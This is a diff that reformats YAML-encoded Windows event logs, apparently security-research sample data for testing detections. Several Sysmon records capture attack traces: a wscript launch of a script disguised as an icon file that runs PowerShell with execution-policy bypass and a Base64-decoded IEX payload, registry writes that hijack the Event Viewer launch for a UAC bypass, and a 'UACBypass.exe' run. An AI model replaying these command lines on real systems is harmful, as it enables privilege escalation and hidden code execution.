6BFD2AD8-963A-4E3D-A596-DDB00305910F 
@@ -531,35 +474,30 @@ Event: System: Channel: Microsoft-Windows-Bits-Client/Operational Computer: MSEDGEWIN10 - Correlation: - "#attributes": - ActivityID: 3FBCCCA9-5F54-4F3C-A2DE-A805CAC185BD + Correlation_attributes: + ActivityID: 3FBCCCA9-5F54-4F3C-A2DE-A805CAC185BD EventID: 60 EventRecordID: 8972 - Execution: - "#attributes": - ProcessID: 8076 - ThreadID: 8756 + Execution_attributes: + ProcessID: 8076 + ThreadID: 8756 Keywords: "0x4000000000000000" Level: 4 Opcode: 2 - Provider: - "#attributes": - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E + Name: Microsoft-Windows-Bits-Client + Security_attributes: + UserID: S-1-5-18 Task: 0 - TimeCreated: - "#attributes": - SystemTime: "2020-11-18T21:53:25.998024Z" + TimeCreated_attributes: + SystemTime: "2020-11-18T21:53:25.998024Z" Version: 1 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Id: 3774C88F-94AD-4FC0-A559-EA76B5D829D6 bytesTotal: 1304160 
@@ -574,35 +512,30 @@ Event: System: Channel: Microsoft-Windows-Bits-Client/Operational Computer: MSEDGEWIN10 - Correlation: - "#attributes": - ActivityID: 6125DC77-C387-4662-BB2F-F3816D1B4629 + Correlation_attributes: + ActivityID: 6125DC77-C387-4662-BB2F-F3816D1B4629 EventID: 59 EventRecordID: 9404 - Execution: - "#attributes": - ProcessID: 8100 - ThreadID: 4424 + Execution_attributes: + ProcessID: 8100 + ThreadID: 4424 Keywords: "0x4000000000000000" Level: 4 Opcode: 1 - Provider: - "#attributes": - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E + Name: Microsoft-Windows-Bits-Client + Security_attributes: + UserID: S-1-5-18 Task: 0 - TimeCreated: - "#attributes": - SystemTime: "2021-03-15T18:55:38.049422Z" + TimeCreated_attributes: + SystemTime: "2021-03-15T18:55:38.049422Z" Version: 1 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: AdditionalInfoHr: 0 Id: 3774C88F-94AD-4FC0-A559-EA76B5D829D6 
@@ -624,35 +557,30 @@ Event: System: Channel: Microsoft-Windows-Bits-Client/Operational Computer: MSEDGEWIN10 - Correlation: - "#attributes": - ActivityID: 6125DC77-C387-4662-BB2F-F3816D1B4629 + Correlation_attributes: + ActivityID: 6125DC77-C387-4662-BB2F-F3816D1B4629 EventID: 60 EventRecordID: 9405 - Execution: - "#attributes": - ProcessID: 8100 - ThreadID: 5972 + Execution_attributes: + ProcessID: 8100 + ThreadID: 5972 Keywords: "0x4000000000000000" Level: 4 Opcode: 2 - Provider: - "#attributes": - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E + Name: Microsoft-Windows-Bits-Client + Security_attributes: + UserID: S-1-5-18 Task: 0 - TimeCreated: - "#attributes": - SystemTime: "2021-03-15T18:55:51.603329Z" + TimeCreated_attributes: + SystemTime: "2021-03-15T18:55:51.603329Z" Version: 1 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Id: 78E48D71-6706-4BEF-BE13-DD6596AECB77 bytesTotal: 44403064 
@@ -667,35 +595,30 @@ Event: System: Channel: Microsoft-Windows-Bits-Client/Operational Computer: MSEDGEWIN10 - Correlation: - "#attributes": - ActivityID: 606AA2F9-84AC-48B8-B85C-1712683C075C + Correlation_attributes: + ActivityID: 606AA2F9-84AC-48B8-B85C-1712683C075C EventID: 59 EventRecordID: 9408 - Execution: - "#attributes": - ProcessID: 8100 - ThreadID: 4396 + Execution_attributes: + ProcessID: 8100 + ThreadID: 4396 Keywords: "0x4000000000000000" Level: 4 Opcode: 1 - Provider: - "#attributes": - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E + Name: Microsoft-Windows-Bits-Client + Security_attributes: + UserID: S-1-5-18 Task: 0 - TimeCreated: - "#attributes": - SystemTime: "2021-03-15T19:01:32.985061Z" + TimeCreated_attributes: + SystemTime: "2021-03-15T19:01:32.985061Z" Version: 1 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: AdditionalInfoHr: 0 Id: 78E48D71-6706-4BEF-BE13-DD6596AECB77 
@@ -717,35 +640,30 @@ Event: System: Channel: Microsoft-Windows-Bits-Client/Operational Computer: MSEDGEWIN10 - Correlation: - "#attributes": - ActivityID: 606AA2F9-84AC-48B8-B85C-1712683C075C + Correlation_attributes: + ActivityID: 606AA2F9-84AC-48B8-B85C-1712683C075C EventID: 61 EventRecordID: 9409 - Execution: - "#attributes": - ProcessID: 8100 - ThreadID: 3656 + Execution_attributes: + ProcessID: 8100 + ThreadID: 3656 Keywords: "0x4000000000000000" Level: 3 Opcode: 2 - Provider: - "#attributes": - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E + Name: Microsoft-Windows-Bits-Client + Security_attributes: + UserID: S-1-5-18 Task: 0 - TimeCreated: - "#attributes": - SystemTime: "2021-03-15T19:29:05.990760Z" + TimeCreated_attributes: + SystemTime: "2021-03-15T19:29:05.990760Z" Version: 1 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: regsvcser.Bypass EventType: SetValue 
@@ -761,30 +679,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 3622 - Execution: - "#attributes": - ProcessID: 2796 - ThreadID: 3592 + Execution_attributes: + ProcessID: 2796 + ThreadID: 3592 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2019-07-19T14:46:20.787648Z" + TimeCreated_attributes: + SystemTime: "2019-07-19T14:46:20.787648Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: regsvcser.Bypass EventType: SetValue @@ -800,30 +714,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 3626 - Execution: - "#attributes": - ProcessID: 2796 - ThreadID: 3592 + Execution_attributes: + ProcessID: 2796 + ThreadID: 3592 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2019-07-19T14:46:20.830945Z" + TimeCreated_attributes: + SystemTime: "2019-07-19T14:46:20.830945Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: DWORD (0x00000001) EventType: SetValue 
@@ -839,30 +749,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 424060 - Execution: - "#attributes": - ProcessID: 3208 - ThreadID: 4804 + Execution_attributes: + ProcessID: 3208 + ThreadID: 4804 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2020-10-23T21:57:36.375368Z" + TimeCreated_attributes: + SystemTime: "2020-10-23T21:57:36.375368Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: DWORD (0x00000001) EventType: SetValue @@ -878,30 +784,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 424064 - Execution: - "#attributes": - ProcessID: 3208 - ThreadID: 4804 + Execution_attributes: + ProcessID: 3208 + ThreadID: 4804 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2020-10-23T21:57:36.376024Z" + TimeCreated_attributes: + SystemTime: "2020-10-23T21:57:36.376024Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: DWORD (0x00000001) EventType: SetValue 
@@ -917,30 +819,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 424244 - Execution: - "#attributes": - ProcessID: 3208 - ThreadID: 4804 + Execution_attributes: + ProcessID: 3208 + ThreadID: 4804 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2020-10-23T21:58:21.930237Z" + TimeCreated_attributes: + SystemTime: "2020-10-23T21:58:21.930237Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: DWORD (0x00000001) EventType: SetValue @@ -956,30 +854,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 424248 - Execution: - "#attributes": - ProcessID: 3208 - ThreadID: 4804 + Execution_attributes: + ProcessID: 3208 + ThreadID: 4804 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2020-10-23T21:58:21.931190Z" + TimeCreated_attributes: + SystemTime: "2020-10-23T21:58:21.931190Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: CommandLine: "\"C:\\Windows\\system32\\mmc.exe\" \"C:\\Windows\\system32\\eventvwr.msc\" " Company: Microsoft Corporation 
@@ -1008,30 +902,26 @@ Event: Correlation: ~ EventID: 1 EventRecordID: 15 - Execution: - "#attributes": - ProcessID: 3192 - ThreadID: 3288 + Execution_attributes: + ProcessID: 3192 + ThreadID: 3288 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 1 - TimeCreated: - "#attributes": - SystemTime: "2019-04-18T16:57:04.681038Z" + TimeCreated_attributes: + SystemTime: "2019-04-18T16:57:04.681038Z" Version: 5 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: EventType: CreateKey Image: "C:\\Windows\\system32\\reg.exe" @@ -1046,30 +936,26 @@ Event: Correlation: ~ EventID: 12 EventRecordID: 18618 - Execution: - "#attributes": - ProcessID: 1780 - ThreadID: 2204 + Execution_attributes: + ProcessID: 1780 + ThreadID: 2204 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 12 - TimeCreated: - "#attributes": - SystemTime: "2019-05-16T14:17:15.763712Z" + TimeCreated_attributes: + SystemTime: "2019-05-16T14:17:15.763712Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: DWORD (0x00000000) EventType: SetValue 
@@ -1085,30 +971,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 18619 - Execution: - "#attributes": - ProcessID: 1780 - ThreadID: 2204 + Execution_attributes: + ProcessID: 1780 + ThreadID: 2204 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2019-05-16T14:17:15.763712Z" + TimeCreated_attributes: + SystemTime: "2019-05-16T14:17:15.763712Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: CommandLine: "\"c:\\windows\\system32\\wscript.exe\" /E:vbs c:\\windows\\temp\\icon.ico \"powershell -exec bypass -c \"\"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')))\"\"\"" Company: Microsoft Corporation 
@@ -1137,30 +1019,26 @@ Event: Correlation: ~ EventID: 1 EventRecordID: 10675 - Execution: - "#attributes": - ProcessID: 2004 - ThreadID: 4480 + Execution_attributes: + ProcessID: 2004 + ThreadID: 4480 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 1 - TimeCreated: - "#attributes": - SystemTime: "2019-08-14T12:17:14.893930Z" + TimeCreated_attributes: + SystemTime: "2019-08-14T12:17:14.893930Z" Version: 5 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: CommandLine: "\"c:\\windows\\system32\\wscript.exe\" /E:vbs c:\\windows\\temp\\icon.ico \"powershell -exec bypass -c \"\"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')))\"\"\"" Company: Microsoft Corporation 
@@ -1189,30 +1067,26 @@ Event: Correlation: ~ EventID: 1 EventRecordID: 10662 - Execution: - "#attributes": - ProcessID: 2004 - ThreadID: 4480 + Execution_attributes: + ProcessID: 2004 + ThreadID: 4480 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 1 - TimeCreated: - "#attributes": - SystemTime: "2019-08-14T11:53:30.022856Z" + TimeCreated_attributes: + SystemTime: "2019-08-14T11:53:30.022856Z" Version: 5 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: CreationUtcTime: "2019-08-03 11:23:15.519" Image: "C:\\Windows\\explorer.exe" @@ -1227,30 +1101,26 @@ Event: Correlation: ~ EventID: 11 EventRecordID: 5401 - Execution: - "#attributes": - ProcessID: 2780 - ThreadID: 3676 + Execution_attributes: + ProcessID: 2780 + ThreadID: 3676 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 11 - TimeCreated: - "#attributes": - SystemTime: "2019-08-03T11:23:15.560614Z" + TimeCreated_attributes: + SystemTime: "2019-08-03T11:23:15.560614Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Company: Yokai Ltd. Description: Yamabiko Proxy 
@@ -1272,30 +1142,26 @@ Event: Correlation: ~ EventID: 7 EventRecordID: 17728 - Execution: - "#attributes": - ProcessID: 2024 - ThreadID: 2004 + Execution_attributes: + ProcessID: 2024 + ThreadID: 2004 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 7 - TimeCreated: - "#attributes": - SystemTime: "2019-05-14T02:32:51.831307Z" + TimeCreated_attributes: + SystemTime: "2019-05-14T02:32:51.831307Z" Version: 3 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Company: "?" Description: "?" @@ -1317,30 +1183,26 @@ Event: Correlation: ~ EventID: 7 EventRecordID: 15975 - Execution: - "#attributes": - ProcessID: 2008 - ThreadID: 1992 + Execution_attributes: + ProcessID: 2008 + ThreadID: 1992 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 7 - TimeCreated: - "#attributes": - SystemTime: "2019-05-11T16:46:26.203657Z" + TimeCreated_attributes: + SystemTime: "2019-05-11T16:46:26.203657Z" Version: 3 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: (Empty) EventType: SetValue 
@@ -1356,30 +1218,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 5944 - Execution: - "#attributes": - ProcessID: 2780 - ThreadID: 3676 + Execution_attributes: + ProcessID: 2780 + ThreadID: 3676 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2019-08-04T10:16:31.476803Z" + TimeCreated_attributes: + SystemTime: "2019-08-04T10:16:31.476803Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: "C:\\Windows\\system32\\cmd.exe /c start C:\\Windows\\system32\\cmd.exe" EventType: SetValue 
@@ -1395,30 +1253,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 5946 - Execution: - "#attributes": - ProcessID: 2780 - ThreadID: 3676 + Execution_attributes: + ProcessID: 2780 + ThreadID: 3676 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2019-08-04T10:16:31.609571Z" + TimeCreated_attributes: + SystemTime: "2019-08-04T10:16:31.609571Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: "C:\\Windows\\system32\\cmd.exe /c start C:\\Windows\\system32\\cmd.exe" EventType: SetValue @@ -1434,30 +1288,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 5953 - Execution: - "#attributes": - ProcessID: 2780 - ThreadID: 3676 + Execution_attributes: + ProcessID: 2780 + ThreadID: 3676 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2019-08-04T10:16:55.441262Z" + TimeCreated_attributes: + SystemTime: "2019-08-04T10:16:55.441262Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: "{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}" EventType: SetValue 
@@ -1473,30 +1323,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 5955 - Execution: - "#attributes": - ProcessID: 2780 - ThreadID: 3676 + Execution_attributes: + ProcessID: 2780 + ThreadID: 3676 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2019-08-04T10:16:55.643799Z" + TimeCreated_attributes: + SystemTime: "2019-08-04T10:16:55.643799Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: CommandLine: "\"C:\\Users\\IEUser\\Downloads\\UACBypass.exe\" " Company: "?" @@ -1525,30 +1371,26 @@ Event: Correlation: ~ EventID: 1 EventRecordID: 4723 - Execution: - "#attributes": - ProcessID: 2748 - ThreadID: 3376 + Execution_attributes: + ProcessID: 2748 + ThreadID: 3376 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 1 - TimeCreated: - "#attributes": - SystemTime: "2019-07-27T22:43:41.424255Z" + TimeCreated_attributes: + SystemTime: "2019-07-27T22:43:41.424255Z" Version: 5 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: CreationUtcTime: "2019-07-27 22:43:41.627" Image: "C:\\Users\\IEUser\\Downloads\\UACBypass.exe" 
@@ -1563,30 +1405,26 @@ Event: Correlation: ~ EventID: 11 EventRecordID: 4724 - Execution: - "#attributes": - ProcessID: 2748 - ThreadID: 3376 + Execution_attributes: + ProcessID: 2748 + ThreadID: 3376 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 11 - TimeCreated: - "#attributes": - SystemTime: "2019-07-27T22:43:41.755254Z" + TimeCreated_attributes: + SystemTime: "2019-07-27T22:43:41.755254Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: CreationUtcTime: "2019-07-27 22:43:41.627" Image: "C:\\Users\\IEUser\\Downloads\\UACBypass.exe" @@ -1601,30 +1439,26 @@ Event: Correlation: ~ EventID: 11 EventRecordID: 4725 - Execution: - "#attributes": - ProcessID: 2748 - ThreadID: 3376 + Execution_attributes: + ProcessID: 2748 + ThreadID: 3376 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 11 - TimeCreated: - "#attributes": - SystemTime: "2019-07-27T22:43:41.755406Z" + TimeCreated_attributes: + SystemTime: "2019-07-27T22:43:41.755406Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: CreationUtcTime: "2019-07-27 22:43:41.641" Image: "C:\\Users\\IEUser\\Downloads\\UACBypass.exe" 
